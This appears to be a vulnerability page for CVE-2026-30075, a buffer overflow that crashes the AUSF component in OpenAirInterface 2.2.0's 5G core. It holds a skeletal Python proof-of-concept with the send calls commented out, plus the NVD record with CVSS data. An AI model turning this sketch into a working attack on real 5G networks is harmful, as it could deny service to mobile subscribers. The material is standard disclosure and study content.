CVE-2026-30075

# PoC Concept for CVE-2026-30075 # This script demonstrates how to send a crafted NAS PDU to trigger the buffer overflow. # Note: This is a conceptual demonstration and requires a 5G stack library to construct valid NAS messages. import socket # Target AUSF component (or AMF which forwards to AUSF) # In a real scenario, this would be the AMF IP/Port listening for N1/N2 traffic. TARGET_IP = "192.168.1.100" TARGET_PORT = 38412 # Example SCTP port for NGAP # Construct a malicious payload # A normal Authentication Response is much smaller. # We send a large buffer (e.g., 100 bytes or more) to overflow the reading buffer in AUSF. malicious_payload = b"\x00" * 200 # 200 bytes of null bytes # In a real 5G attack, this would be wrapped in a NAS Authentication Response message # inside a Uplink NAS Transport container sent via NGAP. # For demonstration purposes, we simulate sending the raw oversized data. def send_exploit(): try: # Create a socket (SCTP is typically used for NGAP, but TCP shown for simplicity) # In practice, tools like Scapy with SCTP support or specific 5G test tools (e.g., srsRAN) are used. print(f"[*] Sending malicious payload to {TARGET_IP}:{TARGET_PORT}") # sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # sock.connect((TARGET_IP, TARGET_PORT)) # sock.send(malicious_payload) # sock.close() print("[+] Payload sent. If vulnerable, AUSF should crash.") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": send_exploit()

{"cve": {"id": "CVE-2026-30075", "sourceIdentifier": "[email protected]", "published": "2026-04-08T17:21:18.503", "lastModified": "2026-04-14T15:47:23.860", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenAirInterface Version 2.2.0 has a Buffer Overflow vulnerability in processing UplinkNASTransport containing Authentication Response containing a NAS PDU with oversize response (For example 100 byte). The response is decoded by AMF and passed to the AUSF component for verification. AUSF crashes on receiving this oversize response. This can prohibit users from further registration and verification and can cause Denial of Services (DoS)."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-120"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openairinterface:oai-cn5g-amf:2.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "1BB4900E-B5A7-40ED-8DA6-4E372D5036D9"}]}]}], "references": [{"url": "https://gitlab.eurecom.fr/oai/cn5g/oai-cn5g-ausf/-/issues/6", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://gitlab.eurecom.fr/oai/cn5g/oai-cn5g-ausf/-/issues?show=eyJpaWQiOiI2IiwiZnVsbF9wYXRoIjoib2FpL2NuNWcvb2FpLWNuNWctYXVzZiIsImlkIjo1NDE5fQ%3D%3D", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://gitlab.eurecom.fr/oai/cn5g/oai-cn5g-ausf/-/issues?show=eyJpaWQiOiI2IiwiZnVsbF9wYXRoIjoib2FpL2NuNWcvb2FpLWNuNWctYXVzZiIsImlkIjo1NDE5fQ%3D%3D", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}